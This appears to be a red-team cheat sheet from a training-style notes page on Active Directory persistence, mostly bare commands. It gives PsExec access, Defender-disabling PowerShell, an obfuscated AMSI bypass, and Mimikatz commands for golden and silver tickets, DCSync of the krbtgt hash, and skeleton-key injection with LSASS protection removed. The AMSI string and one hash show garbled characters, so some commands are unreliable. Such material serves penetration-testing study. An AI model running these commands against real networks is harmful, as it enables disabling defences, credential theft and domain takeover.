Persistence

Get a foothold first !

PsExec64.exe \\test.local -u Domain\user -p Passw0rd! cmd

Disable Defender

Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true

AMSI Bypass

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{O}"-F'F', 'rE' ) ) 3; ( GeT-VariaBle ( "1Q2U" + "zX" )  -VaL_s+)."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{@}{5}" -f'Util', 'A', 'Amsi','.Management.', 'utomation.','s', 'System' ))."g`etf`iE1D"( ( "{O}{2}{1}" -f'amsi','d','InitFaile' ),("{2}{4}{O}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"(${n`ULl},${t`RuE} )

Golden Ticket

Execute mimikatz on DC as DA to get krbtgt hash

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc

Create a ticket on any machine - pass the ticket attack

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-268341927-4156871508-1792461683 /krbtgt:a9b30e5bO0dc865eadcea941le4ade72d /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

List Kerberos services available

klist

To use the DCSync feature for getting krbtg hash execute the below command with DA privileges

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

Silver Ticket

Execute mimikatz on DC as DA to get krbtgt hash

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc

Using hash of the Domain Controller computer account, below command provides access to shares on the DC

Invoke-Mimikatz -Command '"kerberos::golden /domain:ad.domain.local /sid:<sid> /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /rc4:<rc4-hash> /user:Administrator /ptt"'

Skeleton Key

Use the below command to inject a skeleton-Key

Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton' -ComputerName dcorp-dc.dollarcorp.moneycorp.local

access any machine with valid username and password as mimikatz

Enter-PSSession -Computername dcorp-dc.dollarcorp.moneycorp.local -credential dcorp\Administrator

In case LSASS is running as a protected process, we can still use Skeleton Key but it needs the mimikatz driver (mimidriv.sys) on disk of the target DC

mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-
PreviousRemotingNextKerberos

Last updated